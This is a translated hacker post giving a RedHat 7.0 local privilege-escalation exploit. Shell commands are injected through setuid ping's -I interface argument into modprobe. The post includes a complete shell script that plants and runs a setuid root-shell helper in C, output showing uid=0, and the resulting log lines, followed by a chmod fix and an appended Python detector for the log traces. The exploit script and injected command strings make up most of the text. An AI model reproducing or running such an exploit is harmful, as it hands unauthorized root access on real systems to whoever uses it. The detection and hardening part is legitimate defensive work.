RedHat 7 local root vulnerability via ping: details
First, a statement: the author is not responsible for any loss caused by this vulnerability. The attack code is not long; you can write it in shell or Perl, and shell is recommended.

Principle: this may be the major vulnerability of RedHat 7. The -I parameter of ping specifies the interface, and the interface name is passed on to modprobe and insmod, through which arbitrary commands can be executed. Everyone knows the permissions on the ping program look like this:

[hello!sune4gle]$ ls -l /bin/ping
-rwsr-xr-x    1 root     root        20604 Aug  8  2000 /bin/ping

ping needs the setuid bit because it opens a raw socket. We can use ping -I to ping a non-existent IP; the key is the parameter placed in front of the IP, which is the command we want executed. Because of the setuid bit we run ping with an ordinary UID, but its EUID is 0, so the command run through ping executes with superuser permissions. For example, the following command:

[hello!sune4gle]$ ping -I '; chmod o+w .' 195.117.3.59 &>/dev/null

makes the directory writable by other users. We can also use a sleep statement to make the process wait, and during that wait write a C program, compile it and run it:

cat > /x.c << _EOF_
#include <stdlib.h>
#include <unistd.h>
int main(void) {
  setuid(0);
  seteuid(0);
  system("chmod 755 /; rm -f /x; rm -f /x.c");
  execl("/bin/bash", "bash", "-i", (char *)0);
}
_EOF_
gcc /x.c -o /x
chmod 755 /x

Everyone should understand this by now: create the x.c file, compile it, make it setuid, and we have a setuid root shell. The complete script follows:

#!/bin/sh
echo
echo "Redhat 7.0 EXPLOIT"
echo "(c) 2000 suneagle"
echo
echo "enjoy hacking! :)"
echo
PING=/bin/ping
test -u $PING || PING=/bin/ping
if [ ! -u $PING ]; then
  echo "sorry, no setuid ping."
  exit 0
fi
echo "Phase 1: making / world-writable..."
$PING -I '; chmod o+w .' 195.117.3.59 &>/dev/null
sleep 1
echo "Phase 2: compiling helper program in /..."
cat > /x.c << _EOF_
#include <stdlib.h>
#include <unistd.h>
int main(void) {
  setuid(0); seteuid(0);
  system("chmod 755 /; rm -f /x; rm -f /x.c");
  execl("/bin/bash", "bash", "-i", (char *)0);
}
_EOF_
gcc /x.c -o /x
chmod 755 /x
echo "Phase 3: chown/chmod on our helper program..."
$PING -I '; chown 0 x' 202.102.3.1 &>/dev/null
sleep 1
$PING -I '; chmod +s x' 202.101.23.1 &>/dev/null
sleep 1
if [ ! -u /x ]; then
  echo "apparently, this is not exploitable on this system :("
  exit 1
fi
echo "ye! entering rootshell..."
/x
echo "thank you."
Haha, OK. Here are the results of running this shell script on RedHat 7:
First of all, I need an ordinary account, hehe.
[hello!sune4gle]$ ./gtroot.sh
Redhat 7.0 EXPLOIT
(c) 2000 suneagle
enjoy hacking! :)
Phase 1: making / world-writable...
Phase 2: compiling helper program in /...
Phase 3: chown/chmod on our helper program...
ye! entering rootshell...
[hello!root]# id
uid=0(root) gid=500(sune4gle) groups=500(sune4gle)
[hello!root]#
Log left behind after the attack:
Feb 24 11:16:27 sune4gle modprobe: modprobe: insmod ; chmod o+w . failed
Feb 24 11:16:30 sune4gle modprobe: modprobe: insmod ; chown 0 x failed
Feb 24 11:16:31 sune4gle modprobe: modprobe: insmod ; chmod +s x failed
Solution:
Remove or limit the setuid bit of the ping program. chmod 655 clears the setuid bit (the leading 4 of the 4755 shown by ls -l above), so ping no longer runs with EUID 0; ordinary users then cannot open the raw socket and so cannot use ping (or reach the modprobe path) at all.
[hello!sune4gle]# chmod 655 /bin/ping
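As an added defensive example (not part of the original post and not the author's code), the script below covers the two practical sides of this page: it scans syslog-style lines for the trace the technique leaves (modprobe/insmod failures whose "module name" contains shell metacharacters, as in the log above) and it audits the setuid bit that the chmod 655 fix removes. The log lines are constructed from the page's sample plus two benign lines for contrast; the regular expression assumes the modutils message format shown on the page.

```python
"""Defensive checks for the RedHat 7 ping -I / modprobe issue.

1. suspicious_modprobe_events(): flag modprobe failures whose requested
   module name contains shell metacharacters (constructed sample below).
2. mode_has_setuid() / file_is_setuid() / strip_setuid(): audit the setuid
   bit that the page's remedy (chmod 655 /bin/ping) clears.
"""
import os
import re
import stat

# Characters that never belong in a network interface or module name but do
# appear when the -I argument is being used to smuggle a shell command.
SHELL_METACHARS = re.compile(r"[;|&`$(){}<>\s]")

# modutils-style syslog line: "<ts> <host> modprobe: modprobe: insmod <name> failed"
MODPROBE_FAIL = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]+)\s+(?P<host>\S+)\s+modprobe:\s+"
    r"modprobe:\s+insmod\s+(?P<module>.*?)\s+failed\s*$"
)

# Constructed sample: the three lines from the page plus two harmless ones.
SAMPLE_LOG = [
    "Feb 24 11:16:27 sune4gle modprobe: modprobe: insmod ; chmod o+w . failed",
    "Feb 24 11:16:30 sune4gle modprobe: modprobe: insmod ; chown 0 x failed",
    "Feb 24 11:16:31 sune4gle modprobe: modprobe: insmod ; chmod +s x failed",
    "Feb 24 11:20:01 sune4gle modprobe: modprobe: insmod eth1 failed",   # benign typo'd interface
    "Feb 24 11:21:05 sune4gle sshd[512]: Accepted password for sune4gle",  # unrelated line
]


def suspicious_modprobe_events(lines):
    """Return (timestamp, host, module_arg) for every modprobe failure whose
    requested module name contains shell metacharacters."""
    hits = []
    for line in lines:
        m = MODPROBE_FAIL.match(line.rstrip("\n"))
        if not m:
            continue
        module = m.group("module")
        if SHELL_METACHARS.search(module):
            hits.append((m.group("ts"), m.group("host"), module))
    return hits


def mode_has_setuid(mode):
    """True if the permission bits in `mode` include setuid (leading 4 in 4755)."""
    return bool(mode & stat.S_ISUID)


def strip_setuid(mode):
    """Permission bits with setuid cleared. The page's chmod 655 goes further
    and also drops owner execute; this keeps every other bit as it was."""
    return mode & ~stat.S_ISUID


def file_is_setuid(path):
    """True if the file at `path` is setuid; raises FileNotFoundError if absent."""
    return mode_has_setuid(os.stat(path).st_mode)


def setuid_report(paths):
    """Map each existing path to whether it is setuid (missing paths are skipped)."""
    report = {}
    for p in paths:
        try:
            report[p] = file_is_setuid(p)
        except FileNotFoundError:
            continue
    return report


if __name__ == "__main__":
    for ts, host, module in suspicious_modprobe_events(SAMPLE_LOG):
        print(f"{ts} {host}: shell metacharacters in modprobe argument: {module!r}")
    # Hypothetical audit target; on this machine /bin/ping may not exist or
    # may use file capabilities instead of setuid.
    for path, is_suid in setuid_report(["/bin/ping"]).items():
        print(f"{path}: setuid={'yes' if is_suid else 'no'}")
```

Feed real syslog lines to suspicious_modprobe_events() and any hit is worth an incident ticket: a legitimate interface name never contains a semicolon or whitespace. The mode helpers take an integer so they can be applied to output from a file-integrity baseline as well as to the live filesystem.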